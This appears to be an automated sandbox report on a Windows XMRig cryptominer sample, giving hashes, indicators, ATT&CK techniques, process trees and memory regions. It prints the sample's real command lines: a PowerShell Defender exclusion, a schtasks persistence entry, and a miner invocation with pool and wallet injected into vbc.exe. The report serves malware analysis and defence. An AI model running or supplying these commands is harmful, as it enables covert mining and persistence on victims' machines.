xmrig | a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a

Analysis

max time kernel
204s
max time network
205s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 17:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.3MB
MD5

63a5a9ecfd59f81c8c2744f54809c7f8
SHA1

fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
SHA256

a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
SHA512

9356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071
SSDEEP

24576:WdcgTewpeuCLZQ5wrS7j5G1bDD6egAmkI:WdcgT1pehZQYYKTX

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/992-145-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/992-147-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/992-149-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/992-150-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/992-152-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/992-160-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/992-164-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

576 OWT.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1768 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 576 set thread context of 992 576 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

884 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1084 timeout.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exe

pid process

2020 file.exe
1300 powershell.exe
576 OWT.exe
2040 powershell.exe
576 OWT.exe
576 OWT.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
576	OWT.exe

pid	process
1768	cmd.exe

description	pid	process	target process
PID 576 set thread context of 992	576	OWT.exe	vbc.exe

pid	process
884	schtasks.exe

pid	process
1084	timeout.exe

pid	process
2020	file.exe
1300	powershell.exe
576	OWT.exe
2040	powershell.exe
576	OWT.exe
576	OWT.exe

pid	process
460

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	2020	file.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	576	OWT.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeLockMemoryPrivilege	992	vbc.exe
Token: SeLockMemoryPrivilege	992	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

992 vbc.exe

pid	process
992	vbc.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 2020 wrote to memory of 1300	2020	file.exe	powershell.exe
PID 2020 wrote to memory of 1300	2020	file.exe	powershell.exe
PID 2020 wrote to memory of 1300	2020	file.exe	powershell.exe
PID 2020 wrote to memory of 1768	2020	file.exe	cmd.exe
PID 2020 wrote to memory of 1768	2020	file.exe	cmd.exe
PID 2020 wrote to memory of 1768	2020	file.exe	cmd.exe
PID 1768 wrote to memory of 1084	1768	cmd.exe	timeout.exe
PID 1768 wrote to memory of 1084	1768	cmd.exe	timeout.exe
PID 1768 wrote to memory of 1084	1768	cmd.exe	timeout.exe
PID 1768 wrote to memory of 576	1768	cmd.exe	OWT.exe
PID 1768 wrote to memory of 576	1768	cmd.exe	OWT.exe
PID 1768 wrote to memory of 576	1768	cmd.exe	OWT.exe
PID 576 wrote to memory of 2040	576	OWT.exe	powershell.exe
PID 576 wrote to memory of 2040	576	OWT.exe	powershell.exe
PID 576 wrote to memory of 2040	576	OWT.exe	powershell.exe
PID 576 wrote to memory of 428	576	OWT.exe	cmd.exe
PID 576 wrote to memory of 428	576	OWT.exe	cmd.exe
PID 576 wrote to memory of 428	576	OWT.exe	cmd.exe
PID 428 wrote to memory of 884	428	cmd.exe	schtasks.exe
PID 428 wrote to memory of 884	428	cmd.exe	schtasks.exe
PID 428 wrote to memory of 884	428	cmd.exe	schtasks.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe
PID 576 wrote to memory of 992	576	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2FE.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1084

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:884

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
63a5a9ecfd59f81c8c2744f54809c7f8

SHA1
fc9fa3765ac64a6c8a8607f3447d47151acbe7c4

SHA256
a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a

SHA512
9356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071

Download Submit
C:\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
63a5a9ecfd59f81c8c2744f54809c7f8

SHA1
fc9fa3765ac64a6c8a8607f3447d47151acbe7c4

SHA256
a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a

SHA512
9356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2FE.tmp.bat

Filesize
137B

MD5
5eed7297d2782e9f5beec8d789c3857f

SHA1
bcef837e2921aecdab04412d1cc0ed1f5726ffcd

SHA256
be6e079e1b8201f58852a9c93b91e9920f7edc0a57c1e5187d817f09e57e8ba8

SHA512
5b3a77a8a8c84ce66149bdfffd3b24fdf55a17a54c1feff3ceed9bc09d468f2bd8b5b1def5bb53ff4069ae741e3bbf37129982f499c9f18adb0f0bf280a4f522

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a23385795c7ccbd0fa471ccd581f4f3f

SHA1
060b40cd410d35d6e9c0f93d37b3af256547ae2c

SHA256
f55d4e461c4b67c530b18cae905564010c7785e095bc1aebb433437b7f9015a9

SHA512
a48fa2490a097f75efeae5246a68721b7c9d0b90f0e1634ad5484f7e24ccf5971a1311d93825af852b3fe3f1aa42d25faf7d4e9716f1df933baed4785d340d22

Download Submit
\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
63a5a9ecfd59f81c8c2744f54809c7f8

SHA1
fc9fa3765ac64a6c8a8607f3447d47151acbe7c4

SHA256
a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a

SHA512
9356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071

Download Submit
memory/428-114-0x0000000000000000-mapping.dmp

Download
memory/576-128-0x000007FEFEB10000-0x000007FEFEB2F000-memory.dmp

Filesize
124KB

Download
memory/576-118-0x00000000002C0000-0x0000000000301000-memory.dmp

Filesize
260KB

Download
memory/576-165-0x0000000000100000-0x00000000002BC000-memory.dmp

Filesize
1.7MB

Download
memory/576-117-0x0000000000100000-0x00000000002BC000-memory.dmp

Filesize
1.7MB

Download
memory/576-104-0x0000000000100000-0x00000000002BC000-memory.dmp

Filesize
1.7MB

Download
memory/576-103-0x000007FEFF8A0000-0x000007FEFFAA3000-memory.dmp

Filesize
2.0MB

Download
memory/576-139-0x000007FEFCDF0000-0x000007FEFCE4B000-memory.dmp

Filesize
364KB

Download
memory/576-138-0x000007FEFD820000-0x000007FEFD856000-memory.dmp

Filesize
216KB

Download
memory/576-137-0x000007FEFB3A0000-0x000007FEFB3C7000-memory.dmp

Filesize
156KB

Download
memory/576-136-0x000007FEFD5A0000-0x000007FEFD5C5000-memory.dmp

Filesize
148KB

Download
memory/576-135-0x000007FEF9C90000-0x000007FEF9D01000-memory.dmp

Filesize
452KB

Download
memory/576-134-0x000007FEF9B20000-0x000007FEF9B84000-memory.dmp

Filesize
400KB

Download
memory/576-133-0x000007FEFF0F0000-0x000007FEFF13D000-memory.dmp

Filesize
308KB

Download
memory/576-132-0x000007FEF15C0000-0x000007FEF1622000-memory.dmp

Filesize
392KB

Download
memory/576-131-0x000007FEFB1A0000-0x000007FEFB1BC000-memory.dmp

Filesize
112KB

Download
memory/576-102-0x000007FEFFB70000-0x000007FEFFC9D000-memory.dmp

Filesize
1.2MB

Download
memory/576-130-0x000007FEFCFD0000-0x000007FEFCFE7000-memory.dmp

Filesize
92KB

Download
memory/576-129-0x000007FEFD120000-0x000007FEFD142000-memory.dmp

Filesize
136KB

Download
memory/576-101-0x000007FEF3A90000-0x000007FEF447C000-memory.dmp

Filesize
9.9MB

Download
memory/576-121-0x000007FEFEFB0000-0x000007FEFF087000-memory.dmp

Filesize
860KB

Download
memory/576-120-0x000007FEFBE10000-0x000007FEFC025000-memory.dmp

Filesize
2.1MB

Download
memory/576-100-0x000007FEFF4C0000-0x000007FEFF59B000-memory.dmp

Filesize
876KB

Download
memory/576-84-0x0000000000000000-mapping.dmp

Download
memory/576-98-0x000007FEFF820000-0x000007FEFF891000-memory.dmp

Filesize
452KB

Download
memory/576-97-0x000007FEFD8C0000-0x000007FEFD92C000-memory.dmp

Filesize
432KB

Download
memory/576-96-0x0000000077770000-0x000000007788F000-memory.dmp

Filesize
1.1MB

Download
memory/576-89-0x000007FEFACB0000-0x000007FEFAD1F000-memory.dmp

Filesize
444KB

Download
memory/576-91-0x0000000000100000-0x00000000002BC000-memory.dmp

Filesize
1.7MB

Download
memory/576-92-0x000007FEFEB30000-0x000007FEFEB97000-memory.dmp

Filesize
412KB

Download
memory/576-93-0x00000000002C0000-0x0000000000301000-memory.dmp

Filesize
260KB

Download
memory/576-90-0x000007FEF6DA0000-0x000007FEF6E3C000-memory.dmp

Filesize
624KB

Download
memory/576-94-0x0000000077890000-0x000000007798A000-memory.dmp

Filesize
1000KB

Download
memory/576-95-0x000007FEFFAC0000-0x000007FEFFB5F000-memory.dmp

Filesize
636KB

Download
memory/884-116-0x0000000000000000-mapping.dmp

Download
memory/992-164-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-160-0x0000000140343234-mapping.dmp

Download
memory/992-152-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-147-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-150-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-149-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-140-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-141-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-143-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/992-145-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1084-79-0x0000000000000000-mapping.dmp

Download
memory/1300-123-0x000000000232B000-0x000000000234A000-memory.dmp

Filesize
124KB

Download
memory/1300-72-0x0000000000000000-mapping.dmp

Download
memory/1300-115-0x0000000002324000-0x0000000002327000-memory.dmp

Filesize
12KB

Download
memory/1300-73-0x000007FEFC211000-0x000007FEFC213000-memory.dmp

Filesize
8KB

Download
memory/1300-81-0x000007FEF5E90000-0x000007FEF69ED000-memory.dmp

Filesize
11.4MB

Download
memory/1300-127-0x000000000232B000-0x000000000234A000-memory.dmp

Filesize
124KB

Download
memory/1300-82-0x0000000002324000-0x0000000002327000-memory.dmp

Filesize
12KB

Download
memory/1300-76-0x000007FEED5E0000-0x000007FEEE003000-memory.dmp

Filesize
10.1MB

Download
memory/1300-126-0x0000000002324000-0x0000000002327000-memory.dmp

Filesize
12KB

Download
memory/1300-88-0x000000001B770000-0x000000001BA6F000-memory.dmp

Filesize
3.0MB

Download
memory/1768-74-0x0000000000000000-mapping.dmp

Download
memory/2020-75-0x000007FEFEB10000-0x000007FEFEB2F000-memory.dmp

Filesize
124KB

Download
memory/2020-69-0x000007FEFF8A0000-0x000007FEFFAA3000-memory.dmp

Filesize
2.0MB

Download
memory/2020-56-0x000007FEF6DA0000-0x000007FEF6E3C000-memory.dmp

Filesize
624KB

Download
memory/2020-57-0x000007FEFEB30000-0x000007FEFEB97000-memory.dmp

Filesize
412KB

Download
memory/2020-58-0x0000000077890000-0x000000007798A000-memory.dmp

Filesize
1000KB

Download
memory/2020-59-0x000007FEFFAC0000-0x000007FEFFB5F000-memory.dmp

Filesize
636KB

Download
memory/2020-80-0x0000000000610000-0x0000000000651000-memory.dmp

Filesize
260KB

Download
memory/2020-78-0x0000000000D30000-0x0000000000EEC000-memory.dmp

Filesize
1.7MB

Download
memory/2020-55-0x000007FEFACB0000-0x000007FEFAD1F000-memory.dmp

Filesize
444KB

Download
memory/2020-61-0x0000000000D30000-0x0000000000EEC000-memory.dmp

Filesize
1.7MB

Download
memory/2020-62-0x0000000000610000-0x0000000000651000-memory.dmp

Filesize
260KB

Download
memory/2020-60-0x0000000077770000-0x000000007788F000-memory.dmp

Filesize
1.1MB

Download
memory/2020-63-0x000007FEFD8C0000-0x000007FEFD92C000-memory.dmp

Filesize
432KB

Download
memory/2020-71-0x000007FEF6B70000-0x000007FEF6C9C000-memory.dmp

Filesize
1.2MB

Download
memory/2020-70-0x0000000000D30000-0x0000000000EEC000-memory.dmp

Filesize
1.7MB

Download
memory/2020-64-0x000007FEFF820000-0x000007FEFF891000-memory.dmp

Filesize
452KB

Download
memory/2020-68-0x000007FEFFB70000-0x000007FEFFC9D000-memory.dmp

Filesize
1.2MB

Download
memory/2020-67-0x000007FEF6000000-0x000007FEF69EC000-memory.dmp

Filesize
9.9MB

Download
memory/2020-66-0x000007FEFF4C0000-0x000007FEFF59B000-memory.dmp

Filesize
876KB

Download
memory/2020-65-0x000007FEF6CA0000-0x000007FEF6D97000-memory.dmp

Filesize
988KB

Download
memory/2040-122-0x00000000027AB000-0x00000000027CA000-memory.dmp

Filesize
124KB

Download
memory/2040-110-0x000007FEF5E90000-0x000007FEF69ED000-memory.dmp

Filesize
11.4MB

Download
memory/2040-109-0x000007FEED5E0000-0x000007FEEE003000-memory.dmp

Filesize
10.1MB

Download
memory/2040-106-0x0000000000000000-mapping.dmp

Download
memory/2040-111-0x00000000027A4000-0x00000000027A7000-memory.dmp

Filesize
12KB

Download
memory/2040-119-0x00000000027A4000-0x00000000027A7000-memory.dmp

Filesize
12KB

Download
memory/2040-112-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/2040-125-0x00000000027AB000-0x00000000027CA000-memory.dmp

Filesize
124KB

Download
memory/2040-124-0x00000000027A4000-0x00000000027A7000-memory.dmp

Filesize
12KB

Download